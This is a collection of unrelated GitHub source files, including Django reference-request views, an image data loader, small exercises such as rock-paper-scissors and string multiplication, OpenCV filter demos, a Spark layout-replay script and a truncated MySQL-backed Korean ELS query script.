CorrectRefereeDetailsForm(request.POST, instance=referee)\n if form.is_valid():\n form.save()\n referee.log_details_corrected(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = CorrectRefereeDetailsForm(instance=referee)\n\n return TemplateResponse(\n request,\n \"cciw/officers/correct_referee_details.html\",\n {\n \"form\": form,\n \"referee\": referee,\n },\n )\n\n\ndef _get_previous_reference(referee: Referee, prev_ref_id: int) -> tuple[bool, Reference | None]:\n \"\"\"\n Get previous reference that matches prev_ref_id, returning:\n (\n bool indicating an exact previous reference match,\n previous reference\n\n \"\"\"\n exact_prev_reference, prev_references = get_previous_references(referee)\n\n if exact_prev_reference is not None:\n if exact_prev_reference.id != prev_ref_id:\n # This could happen only if the user has fiddled with URLs, or\n # there has been some update on the page.\n return (False, None)\n return (True, exact_prev_reference)\n else:\n # Get old referee data\n prev_references = [r for r in prev_references if r.id == prev_ref_id]\n if len(prev_references) != 1:\n return (False, None)\n return (False, prev_references[0])\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@for_htmx(use_block_from_params=True)\ndef request_reference(request: HttpRequest, camp_id: CampId, referee_id: int):\n camp = get_camp_or_404(camp_id)\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n app = referee.application\n\n context = {}\n # Work out 'old_referee' or 'known_email_address', and the URL to use in the\n # message.\n try:\n prev_ref_id = int(request.GET[\"prev_ref_id\"])\n except (KeyError, ValueError):\n prev_ref_id = None\n if prev_ref_id:\n prev_reference_is_exact, prev_reference = _get_previous_reference(referee, prev_ref_id)\n if prev_reference is None:\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n context[\"known_email_address\"] = prev_reference_is_exact\n context[\"old_referee\"] = prev_reference.referee\n url = make_ref_form_url(referee.id, 
prev_ref_id)\n else:\n url = make_ref_form_url(referee.id, None)\n prev_reference = None\n\n messageform_info = dict(\n referee=referee,\n applicant=app.officer,\n camp=camp,\n url=url,\n sender=request.user,\n update=prev_reference is not None,\n )\n\n if request.method == \"POST\":\n if \"send\" in request.POST:\n context[\"show_messageform\"] = True\n form = SendReferenceRequestForm(request.POST, message_info=messageform_info)\n if form.is_valid():\n send_reference_request_email(wordwrap(form.cleaned_data[\"message\"], 70), referee, request.user, camp)\n referee.log_request_made(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n elif \"cancel\" in request.POST:\n return htmx_reference_events_response(closeModal=True)\n else:\n form = SendReferenceRequestForm(message_info=messageform_info)\n\n context.update(\n {\n \"already_requested\": referee.reference_was_requested(),\n \"referee\": referee,\n \"app\": app,\n \"is_update\": prev_reference is not None,\n \"form\": form,\n }\n )\n\n return TemplateResponse(request, \"cciw/officers/request_reference.html\", context)\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef fill_in_reference_manually(request: HttpRequest, camp_id: CampId, referee_id: int):\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n reference = referee.reference if hasattr(referee, \"reference\") else None\n\n try:\n prev_ref_id = int(request.GET[\"prev_ref_id\"])\n except (KeyError, ValueError):\n prev_ref_id = None\n if prev_ref_id:\n _, prev_reference = _get_previous_reference(referee, prev_ref_id)\n else:\n prev_reference = None\n\n if request.method == \"POST\":\n if \"save\" in request.POST:\n form = AdminReferenceForm(request.POST, instance=reference)\n if form.is_valid():\n form.save(referee, user=request.user)\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # Cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = get_initial_reference_form(reference, referee, prev_reference, AdminReferenceForm)\n\n return TemplateResponse(\n request,\n \"cciw/officers/fill_in_reference_manually.html\",\n {\n \"referee\": referee,\n \"app\": referee.application,\n \"form\": form,\n \"is_update\": prev_reference is not None,\n },\n )\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef nag_by_officer(request: HttpRequest, camp_id: CampId, referee_id: int):\n # htmx only view, runs in modal dialog\n camp = get_camp_or_404(camp_id)\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n app = referee.application\n officer = app.officer\n\n messageform_info = dict(referee=referee, officer=officer, sender=request.user, camp=camp)\n\n if request.method == \"POST\":\n if \"send\" in request.POST:\n form = SendNagByOfficerForm(request.POST, message_info=messageform_info)\n if form.is_valid():\n send_nag_by_officer(wordwrap(form.cleaned_data[\"message\"], 70), officer, referee, request.user)\n referee.log_nag_made(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = SendNagByOfficerForm(message_info=messageform_info)\n\n return TemplateResponse(\n request,\n \"cciw/officers/nag_by_officer.html\",\n {\n \"referee\": referee,\n \"app\": app,\n \"officer\": officer,\n \"form\": form,\n },\n 
)\n\n\n@staff_member_required\n@camp_admin_required\n@cache_control(max_age=3600)\ndef view_reference(request, reference_id: int):\n reference = get_object_or_404(Reference.objects.filter(id=reference_id))\n return TemplateResponse(\n request,\n \"cciw/officers/view_reference_form.html\",\n {\n \"reference\": reference,\n \"officer\": reference.referee.application.officer,\n \"referee\": reference.referee,\n \"is_popup\": True,\n },\n )\n\n\ndef htmx_reference_events_response(\n closeModal: bool = False,\n refreshReferee: Referee | None = None,\n):\n events = {}\n if refreshReferee is not None:\n events[f\"refreshReferee-{refreshReferee.id}\"] = True\n if closeModal:\n events[\"jsCloseModal\"] = closeModal\n\n return add_hx_trigger_header(HttpResponse(\"\"), events)\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@cache_control(max_age=3600)\ndef officer_history(request, officer_id: int):\n officer = get_object_or_404(User.objects.filter(id=officer_id))\n referee_pairs = [\n app.referees\n for app in (\n officer.applications.all().prefetch_related(\"referee_set\", \"referee_set__reference\").order_by(\"-date_saved\")\n )\n ]\n\n return TemplateResponse(\n request,\n \"cciw/officers/officer_history.html\",\n {\n \"officer\": officer,\n \"referee_pairs\": referee_pairs,\n },\n )\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/views/leaders/references.py","file_name":"references.py","file_ext":"py","file_size_in_byte":12172,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"72428608809","text":"'''\nPurpose: Loads .jpg images into numpy arrays, tags them and stores image and label in dictionary, sends to .npy file for easy access.\n'''\n\nimport os\nimport cv2\nimport glob\nimport numpy as np\nfrom sklearn.utils import shuffle\n\nclass data_loader():\n\tdef __init__(self, data_filepath=''):\n\t\t'''\n\t\tInitializes data filepath, the labels for AD types, and empty dicts for the data.\n\t\t'''\n\t\tif data_filepath == '':\n\t\t\tself.filepath = os.path.abspath(os.path.join(os.getcwd(),'data'))\n\t\telse:\n\t\t\tself.filepath = data_filepath\n\n\t\tself.ad_types = ['MildDemented','ModerateDemented','NonDemented','VeryMildDemented']\n\t\tself.train_data = {'images':[], 'labels':[]}\n\t\tself.test_data = {'images':[], 'labels':[]}\n\t\tself.all_data = {'images':[], 'labels':[], 'binary_labels':[]}\n\n\tdef load_images(self):\n\t\t'''\n\t\tLoads train and test images, calls _apply_labels() to add labels, adds to train/test dicts.\n\t\t'''\n\t\ttest_images = []\n\t\tfor label in self.ad_types:\n\t\t\ttrain_files = glob.glob(self.filepath+'/train/'+label+'/*.jpg')\n\t\t\ttest_files = glob.glob(self.filepath+'/test/'+label+'/*.jpg')\n\n\t\t\ttrain_images = []\n\t\t\tfor file in train_files:\n\t\t\t\timage = cv2.imread(file)\n\t\t\t\t#image = cv2.cvtColor(cv2.imread(file), cv2.COLOR_BGR2GRAY)\n\t\t\t\ttrain_images.append(image)\n\n\t\t\ttagged_images = self._apply_labels(train_images, label)\n\n\t\t\tself.train_data['images'] = self.train_data['images'] + tagged_images['images']\n\t\t\tself.train_data['labels'] = self.train_data['labels'] + tagged_images['labels']\n\n\t\t\ttest_images = []\n\t\t\tfor file in test_files:\n\t\t\t\timage = cv2.imread(file)\n\t\t\t\t#image = cv2.cvtColor(cv2.imread(file), cv2.COLOR_BGR2GRAY)\n\t\t\t\ttest_images.append(image)\n\n\t\t\ttagged_images = self._apply_labels(test_images, label)\n\n\t\t\tself.test_data['images'] = self.test_data['images'] 
+ tagged_images['images']\n\t\t\tself.test_data['labels'] = self.test_data['labels'] + tagged_images['labels']\n\n\tdef _apply_labels(self, images, label):\n\t\t'''\n\t\tCombines the images with the correct label .\n\t\t'''\n\t\tlabels_len = len(images)\n\t\tlabels = [label] * labels_len\n\n\t\ttagged_images = {'images':images, 'labels':labels}\n\n\t\treturn tagged_images\n\n\tdef merge_data(self):\n\t\t'''\n\t\tMerges the train and test data into a single dataset for analysis and custom train/test splits.\n\t\tRequires load_data() to have been successfully ran.\n\t\t'''\n\t\timages = self.train_data['images'] + self.test_data['images']\n\t\tlabels = self.train_data['labels'] + self.test_data['labels']\n\n\t\t# shuffle data while maintaining image/label relationship\n\t\timages, labels = shuffle(np.asarray(images), np.asarray(labels), random_state=0)\n\n\t\tself.all_data['images'] = images\n\t\tself.all_data['labels'] = labels\n\n\tdef extract_data(self):\n\t\t'''\n\t\tSends merged data to .npy (numpy) files for quicker access when performing analysis and modeling.\n\t\tRequires merge_data() to have been successfully ran.\n\t\t'''\n\t\tnp.save(self.filepath+'/image_arrays.npy', self.all_data['images'])\n\t\tnp.save(self.filepath+'/image_labels.npy', self.all_data['labels'])\n\t\tnp.save(self.filepath+'/binary_image_labels.npy', self.all_data['binary_labels'])\n\n\tdef create_binary_labels(self):\n\t\t'''\n\t\tCreates labels for identifying whether an image has any AD or not.\n\t\t'''\n\t\tbinary_labels = []\n\t\tfor label in self.all_data['labels']:\n\t\t\tif label != 'NonDemented':\n\t\t\t\tbinary_labels.append(1)\n\t\t\telse:\n\t\t\t\tbinary_labels.append(0)\n\n\t\tself.all_data['binary_labels'] = binary_labels\n\n'''\nimport data_loader as dl\nd = dl.data_loader()\nd.load_images()\nd.merge_data()\nd.create_binary_labels()\nd.extract_data()\n\n'''","repo_name":"bjhammack/masters-thesis-alzheimers-detection","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6822446574","text":"class ContactManager:\n\n\n\tdef __init__(self, name, phone_number,email_address,website,birth_day,linkedin_id):\n\n\t\tself.name = name\n\t\tself.phone_number = phone_number\n\t\tself.email_address = email_address\n\t\tself.website = website\n\t\tself.birth_day = birth_day\n\t\tself.linkedin_id = linkedin_id\n\n\n\tdef __repr__(self):\n\t\treturn \"\"\"\n\t\tName: {}\n\t\tPhone: {}\n\t\tEmail: {}\n\t\tWebsite: {}\n\t\tBirthday: {}\n\t\tLinkedin: {}\n\t\t\"\"\".format(self.name, self.phone_number, self.email_address, self.website, self.birth_day, self.linkedin_id)\n\nname = input(\"Enter your name\")\nphone_number = input(\"Enter phone number\")\nemail_address = input(\"Enter Email Address\")\nwebsite = input(\"Whats your website URL?\")\nbirth_day = input(\"When is your Birthday?\")\nlinkedin_id = input(\"Enter your linkedin ID\")\n\nely= ContactManager(name,phone_number,email_address,website,birth_day,linkedin_id)\nprint(ely)\n\n\n\t\n\t\n","repo_name":"elypad/contact_manager","sub_path":"Technology/ContactManager/contact_manager.py","file_name":"contact_manager.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22307660222","text":"from naff import Member, slash_command\n\nfrom ElevatorBot.commandHelpers.optionTemplates import default_user_option, 
lfg_event_id\nfrom ElevatorBot.commandHelpers.subCommandTemplates import lfg_sub_command\nfrom ElevatorBot.commands.base import BaseModule\nfrom ElevatorBot.core.destiny.lfg.lfgSystem import LfgMessage\nfrom ElevatorBot.discordEvents.customInteractions import ElevatorInteractionContext\nfrom ElevatorBot.misc.discordShortcutFunctions import has_admin_permission\nfrom ElevatorBot.misc.formatting import embed_message\n\n\nclass LfgKick(BaseModule):\n @slash_command(\n **lfg_sub_command,\n sub_cmd_name=\"kick\",\n sub_cmd_description=\"Kick a user from an lfg event\",\n dm_permission=False,\n )\n @lfg_event_id()\n @default_user_option(description=\"The user you want to kick\", required=True)\n async def kick(self, ctx: ElevatorInteractionContext, lfg_id: int, user: Member):\n # get the message obj\n lfg_message = await LfgMessage.from_lfg_id(ctx=ctx, lfg_id=lfg_id, client=ctx.bot, guild=ctx.guild)\n\n # error if that is not an lfg message\n if not lfg_message:\n return\n\n # test if the user is admin or author\n if ctx.author.id != lfg_message.author_id:\n if not await has_admin_permission(ctx=ctx, member=ctx.author):\n return\n\n if await lfg_message.remove_member(user):\n embed = embed_message(\n \"Success\",\n f\"{user.mention} has been removed from the LFG event [{lfg_id}]({lfg_message.message.jump_url})\",\n )\n\n else:\n embed = embed_message(\n \"Error\",\n f\"{user.mention} could not be deleted from the LFG event [{lfg_id}]({lfg_message.message.jump_url}), because they are not in it\",\n )\n\n await ctx.send(ephemeral=True, embeds=embed)\n\n\ndef setup(client):\n LfgKick(client)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/commands/a_destiny/lfg/kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"27063502209","text":"from geopy.geocoders import Nominatim\ndef get_coordinates(input):\n geolocator = Nominatim(user_agent=\"here\")\n location = geolocator.geocode(input)\n try:\n coordinates = (location.latitude, location.longitude)\n return coordinates\n except:\n print(\"Location not found, please try again.\")\n\n","repo_name":"arikscherm/auto-trip-planner","sub_path":"send/geocode/geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3705648545","text":"import numpy as np\nfrom sunds.features import normal\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\n\ndef _get_encoded_img(image_array: np.ndarray) -> bytes:\n if image_array.ndim == 2: # Expand 2d array\n image_array = image_array[..., None]\n return tf.image.encode_png(image_array).numpy()\n\n\nclass ImageFeaturesTest(tfds.testing.FeatureExpectationsTestCase):\n\n def testNormalImage(self):\n img = np.random.rand(24, 24, 3).astype(np.float32)\n img_discrete = ((img + 1.0) * 32767.5).astype(np.uint16)\n img2 = np.array(\n [\n [[1.0, 0.0, 0.0]],\n [[1e-6, 0.4, -1.0]],\n [[0.9999999999999999999999999999, 0.4, -1.0]],\n ]\n )\n atol = 1e-04\n\n self.assertFeatureEagerOnly(\n feature=normal.NormalImage(),\n shape=(None, None, 3),\n dtype=np.float32,\n tests=[\n # Numpy array\n tfds.testing.FeatureExpectationItem(\n value=img,\n expected=img,\n expected_serialized=_get_encoded_img(img_discrete),\n atol=atol,\n ),\n tfds.testing.FeatureExpectationItem(\n value=img2,\n expected=img2,\n atol=atol,\n ),\n ],\n 
)\n","repo_name":"google-research/sunds","sub_path":"sunds/features/normal_test.py","file_name":"normal_test.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"71876948648","text":"from typing import Optional\nfrom listnode import ListNode, create_single_linked_list\n\n\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0':\n return '0'\n\n power = 1\n response = 0\n map = {}\n\n for char1 in num1[::-1]:\n temp = 0\n response_temp = []\n if char1 not in map:\n for char2 in num2[::-1]:\n whole, remainder = divmod(int(char1) * int(char2), 10)\n remainder = remainder + temp\n temp = whole\n if remainder > 9:\n remainder = remainder % 10\n temp = temp + 1\n response_temp.append(remainder)\n if temp != 0:\n response_temp.append(temp)\n map[char1] = response_temp\n else:\n response_temp = map[char1]\n\n response = response + int(''.join(str(c) for c in response_temp[::-1])) * power\n power = power * 10\n\n return str(response)\n\n\nsolution = Solution()\nprint(solution.multiply(num1 = \"123456789\", num2 = \"987654321\"))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/23_multiply_strings.py","file_name":"23_multiply_strings.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15163052566","text":"# Este programa es un piedra, papel, tijeras correspondiente al ejercicio 5 de la práctica 4.\n\n# Se importa librería random\nfrom random import choice\n\n# Opciones de juego\nopciones = [\"piedra\", \"papel\", \"tijera\"]\n\n# Opciones válidas para elegir del usuario\nvalidas = ['1','2','3','n']\n\n# Resultados arrancan en 0\nvictorias = derrotas = empates = 0\n\n\n# Esto es una variable doc-string. Se hace con triple comilla (pueden ser dobles o simples).\n# Esto permite hacer strings de mas de una línea.\n# Por lo general, este tipo de string se usan para documentar una función. Se verá mas adelante.\ntexto = '''Elija una opción.\n1) Piedra\n2) Papel\n3) Tijera\nn) Salir\n \n Su opción: '''\n\nwhile (True):\n # Le pido al player que elija una opción.\n player = input(texto)\n \n # Para descartar opciones inválidas\n if not player in validas: \n print(\"¡Opción inválida!\")\n continue # Vuelve a reiniciar el loop\n\n # El usuario elige salir del juego\n if player.lower() == 'n':\n break # Rompe el loop\n\n # Se convierte la opción del player a una opción válida en string\n pl = opciones[int(player)-1] \n\n # Elije la computadora\n pc = choice(opciones) # Opción en texto\n\n # Determinar si el player ganó. Estos son los casos en el que el usuario gana.\n # Observar el uso de and y or.\n gano = (pl == 'piedra' and pc == 'tijera') or (pl == 'papel' and pc == 'piedra') or (pl == 'tijera' and pc == 'papel')\n\n if gano: # Gana el player\n print (f\"¡Ganaste! Yo elegí {pc}\\n\")\n victorias+=1 # Se suma una victoria\n elif pl == pc: # Empate. Las opciones de juego son iguales. \n print (f\"¡Empatamos! Yo también elegí {pc}\\n\")\n empates+=1 # Se suma un empate\n else: # Gana PC\n print (f\"¡Perdiste! 
Yo elegí {pc}\\n\")\n derrotas+=1 # Se suma una derrota\n\n # Vuelve al loop\n\n\n\n\n# Informo resultados\nprint(f\"\"\"\n----------------\n¡Fin del juego!.\nResumen:\n\\tVictorias: {victorias}\n\\tDerrotas: {derrotas}\n\\tEmpates: {empates}\n\\tTotal de partidas: {victorias+derrotas+empates}\n\nGracias por jugar.\n----------------\n\"\"\")","repo_name":"kity-linuxero/practicas_23","sub_path":"practicas/ej_resueltos/pr4/ej5-cris.py","file_name":"ej5-cris.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22402918567","text":"import constriction\nimport numpy as np\nimport scipy as sp\nrg=65536\n\nentropy_model = constriction.stream.model.QuantizedGaussian(-rg, rg, mean=0, std=1e-5)\ncoder = constriction.stream.queue.RangeEncoder()\ntheory=0\nfor i in range(2048):\n message=np.random.randint(-100, 100)\n coder.encode(message, entropy_model)\n compressed = coder.get_compressed()\n theory -= np.log2(sp.stats.norm.cdf(message+0.5, loc=0, scale=1e-5) - sp.stats.norm.cdf(message-0.5, loc=0, scale=1e-5))\n print(f'{theory} vs {len(compressed) * 32} bits (includes padding to a multiple of 32 bits).')\n","repo_name":"tongdaxu/SoftVQ","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26555474255","text":"import numpy as np\nimport cv2 as cv\n\nimg = cv.imread('pikachu.png') #original\n\nimgGrayscale = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n\n\nimgBlurred5x5 = cv.blur(imgGrayscale,(5,5))\nimgBlurred15x15 = cv.blur(imgGrayscale,(15,15))\n\nimgGaussianBlurred5x5 = cv.GaussianBlur(imgGrayscale,(5,5),0)\nimgGaussianBlurred15x15 = cv.GaussianBlur(imgGrayscale,(15,15),0)\n\nimgCanny1 = cv.Canny(imgGrayscale,50,100)\nimgCanny2 = cv.Canny(imgBlurred5x5,50,100)\nimgCanny3 = cv.Canny(imgGaussianBlurred15x15,50,100)\n\nkernel = np.ones((3,3),np.uint8)\nimgDilation = cv.dilate(imgCanny2,kernel,iterations = 1)\nimgErosion = cv.erode(imgDilation,kernel,iterations = 1)\n\n#cv.imshow('Original',img)\ncv.imshow('Grayscale',imgGrayscale)\n#cv.imshow('Blur 5x5',imgBlurred5x5)\n#cv.imshow('Blur15x15',imgBlurred15x15)\n#cv.imshow('Gaussian Blur 5x5',imgGaussianBlurred5x5)\n#cv.imshow('Gaussian Blur15x15',imgGaussianBlurred15x15)\n\n#cv.imshow('Detecção de borda: Canny1',imgCanny1)\ncv.imshow('Detecção de borda: Canny2',imgCanny2)\n#cv.imshow('Detecção de borda: Canny3',imgCanny3)\ncv.imshow('Dilation',imgDilation)\ncv.imshow('Erosao',imgErosion)\n\n\n\nk = cv.waitKey(0)\n","repo_name":"fellowsheep/PG2022-2","sub_path":"HelloOpenCV-Python/HelloOpenCVFilters.py","file_name":"HelloOpenCVFilters.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34186600690","text":"from utils.setup import *\nfrom utils.config import *\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom e2e.partition import *\nimport pickle\nimport argparse\nimport time\n\n\ndef reorg(move_schedule, rewrite, fname=None):\n # Replay reorg\n reorg_time = []\n moves = []\n # Make initial layout (same across different algorithms)\n if fname is None:\n data_dir = config[\"path\"]\n in_dir = \"%s/%s/%d\" % (root, config[\"ds\"], 0)\n else:\n data_dir = join(config[\"path\"], fname)\n in_dir = \"%s/%s/%s-%d\" % (root, config[\"ds\"], fname, 0)\n labels = {}\n # Create layouts used\n indices = []\n for [t, 
path] in move_schedule:\n if t > 0:\n indices.append(t)\n print(t, path)\n label_path = path\n lid = 0\n if 'offline' in path:\n policy = 'offline'\n else:\n lid = int((path.split('/')[-1]).split('.')[0])\n policy = 'res'\n if 'sw/' in path:\n policy = 'sw'\n if not '-label' in label_path:\n label_path += '-label'\n bids = pickle.load(open(label_path, \"rb\"))\n if t == 0:\n if not os.path.exists(in_dir) and rewrite:\n pm.load_and_reorg_with_labels(bids, data_dir, in_dir, True)\n moves.append([0, in_dir])\n labels[label_path] = in_dir\n continue\n if label_path in labels:\n out_dir = labels[label_path]\n else:\n if fname is None:\n out_dir = \"%s/%s/%s-%d\" % (root, config[\"ds\"], policy, lid)\n else:\n out_dir = \"%s/%s/%s-%s-%d\" % (root, config[\"ds\"], fname, policy, lid)\n if args.method == 'z':\n out_dir += \"-z\"\n labels[label_path] = out_dir\n if rewrite and not os.path.exists(out_dir):\n t0 = time.time()\n pm.load_and_reorg_with_labels(bids, in_dir, out_dir, t == 0)\n t1 = time.time()\n reorg_time.append(t1 - t0)\n print(\"[T=%d] Creating layout %d in %f\" % (t, lid, t1 - t0))\n if True:\n moves.append([t, out_dir])\n print(\"%s avg reorg time: %f\" % (fname, np.average(reorg_time)))\n if rewrite:\n if fname is None:\n pickle.dump({\"idx\": indices, \"time\": reorg_time}, open(\"results/e2e/%s-%s-%s-%s-reorg.p\" % (\n config[\"ds\"], qfile, args.alg, args.method), 'wb'))\n else:\n pickle.dump({\"idx\": indices, \"time\": reorg_time}, open(\"results/e2e/%s-%s-%s-%s-%s-reorg.p\" % (\n config[\"ds\"], fname, qfile, args.alg, args.method), 'wb'))\n return moves, reorg_time\n\n\ndef query(query_schedule, moves, sqls, N, fname=None):\n query_time = []\n j = 1\n in_dir = moves[j - 1][1]\n np.random.seed(0)\n samples = sorted(np.random.choice(len(query_schedule), N, replace=False))\n print(samples[-10:])\n for q_idx in samples:\n while j < len(moves) and q_idx >= moves[j][0]:\n j += 1\n in_dir = moves[j-1][1]\n bids = query_schedule[q_idx]\n t0 = time.time()\n pm.run_query(in_dir, bids, sqls[q_idx])\n t1 = time.time()\n print(q_idx, in_dir, len(bids), t1-t0)\n query_time.append(t1 - t0)\n print(\"%s avg query time: %f\" % (fname, np.average(query_time)))\n if fname is None:\n pickle.dump({\"idx\": samples, \"time\": query_time}, open(\"results/e2e/%s-%s-%s-%s-query.p\" % (\n config[\"ds\"], qfile, args.alg, args.method), 'wb'))\n else:\n pickle.dump({\"idx\": samples, \"time\": query_time}, open(\"results/e2e/%s-%s-%s-%s-%s-query.p\" % (\n config[\"ds\"], fname, qfile, args.alg, args.method), 'wb'))\n return query_time\n\n\ndef run(num_trails, fname):\n q = []\n m = []\n for trials in range(num_trails):\n if args.alg == \"random\":\n ds = config[\"ds\"]\n if fname is not None:\n ds = fname\n move_schedule = schedule[\"%s-%d\" % (ds, trials)][\"move\"]\n query_schedule = schedule[\"%s-%d\" % (ds, trials)][\"query\"]\n else:\n move_schedule = schedule[\"move\"]\n query_schedule = schedule[\"query\"]\n\n # Reorg replay\n moves, reorg_time = reorg(move_schedule, args.rewrite, fname)\n # Query replay\n query_time = query(query_schedule, moves, sqls, args.n, fname)\n\n # Add cost\n q.append(np.average(query_time) * len(query_schedule))\n m.append(np.average(reorg_time) * (len(moves) - 1))\n\n return q, m\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Schedule replayer.')\n parser.add_argument('--config', default=\"demo\", help=\"Config File Path\")\n parser.add_argument('--rewrite', action='store_true')\n parser.add_argument('--n', type=int, default=2000)\n 
parser.add_argument('--alg', default='offline')\n parser.add_argument('--root', default=\"/mnt/1/partition\")\n tmp = parser.parse_args()\n args = Args(tmp.config)\n args.rewrite = tmp.rewrite\n args.alg = tmp.alg\n args.m = tmp.n\n root = tmp.root\n qfile = args.q\n alpha = args.alpha\n eps = args.eps\n session = SparkSession.builder.config(\"spark.master\", \"local[4]\").config(\"spark.driver.memory\", \"4g\").getOrCreate()\n with open(\"resources/query/%s.sql\" % qfile, \"r\") as file:\n sqls = [line.rstrip() for line in file]\n\n fnames, files, parts, config = setup_perfile(args)\n for i, fname in enumerate(fnames):\n k = parts[fname]\n pm = PartitionManager(session, k)\n # Load schedule\n if args.alg == \"random\":\n num_trails = 3\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s-%d-%.2f-%d.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method, alpha, eps, args.gamma), \"rb\"))\n else:\n num_trails = 1\n if args.alg == \"offline\":\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method), \"rb\"))\n else:\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s-%d.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method, alpha), \"rb\"))\n\n # Main\n q, m = run(num_trails, fname)\n print(\"[%s] Query: %f, Movement: %f\" % (fname, np.average(q), np.average(m)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"d2i-lab/oreo","sub_path":"replay_main.py","file_name":"replay_main.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14853995669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 22 17:04:47 2016\n\n@author: Daishin\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfxrate = 1180\n'''\nimport pandas.io.data as web\nfxrate = web.DataReader('DEXKOUS','fred')\nfxrate = fxrate['DEXKOUS'][-1]\n'''\nimport pymysql\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport dateutil.relativedelta as rd\ntodaysDate = datetime.datetime.today()\nd = datetime.datetime.today() - rd.relativedelta(days=1) \nwhile d.weekday()>4:\n d = d - rd.relativedelta(days=1)\ndstr = d.strftime(\"%Y-%m-%d\")\n\n# MySQL Connection 연결\nconn = pymysql.connect(host='fdos-mt', user='root', password='3450', #db='ficc_DRvs', \n charset='utf8')\n \n# Connection 으로부터 Cursor 생성\ncurs = conn.cursor()\n \n# SQL문 실행\nsql1 = \"\"\"\nSELECT A.운용코드, A.종류, A.발행일, A.상환일, A.최초액면금액, B.액면금액, \nA.기초자산수, A.기초자산코드1, A.기초자산코드2, A.기초자산코드3, B.현재가1, B.현재가2, B.현재가3, B.S1, B.S2, B.S3, \nB.변동성1, B.변동성2, B.변동성3, B.상관계수12, B.상관계수23, B.상관계수31 \nFROM els_kjh.issue_info A\nLEFT JOIN (SELECT * FROM els_kjh. 
